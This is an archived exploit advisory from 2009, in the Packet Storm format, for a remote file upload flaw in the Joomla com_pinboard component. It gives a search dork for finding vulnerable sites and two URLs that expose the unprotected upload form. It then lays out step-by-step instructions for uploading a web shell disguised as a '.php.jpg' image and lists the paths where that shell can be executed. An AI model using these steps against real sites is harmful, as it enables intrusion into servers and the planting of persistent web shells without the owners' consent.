Joomla Pinboard Remote File Upload

2009-06-25T00:00:00
ID PACKETSTORM:78627
Type packetstorm
Reporter ViRuSMaN
Modified 2009-06-25T00:00:00

Description

                                        
                                            `##############################################################  
|  
| Joomla Component [com_pinboard] Remote File Upload Vulnerability  
|  
| Author : ViRuSMaN  
|  
| Contact : v-.m@live.com  
|  
| Home : Islam-Attack.CoM , HackTeach.OrG  
|  
##############################################################  
|  
| Dork inurl:com_pinboard  
|  
| Exploite :  
|  
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload  
|  
| or  
|  
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm  
|  
| [#] click on the photo in Top Of Left  
|  
| [#] upload your shell shell.php.jpg & Confirmer SVP  
|  
| [#] Pwd Your Shell  
|   
| target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg  
|  
| Or  
|  
| target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg   
|  
##############################################################  
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's   
##############################################################  
  
  
`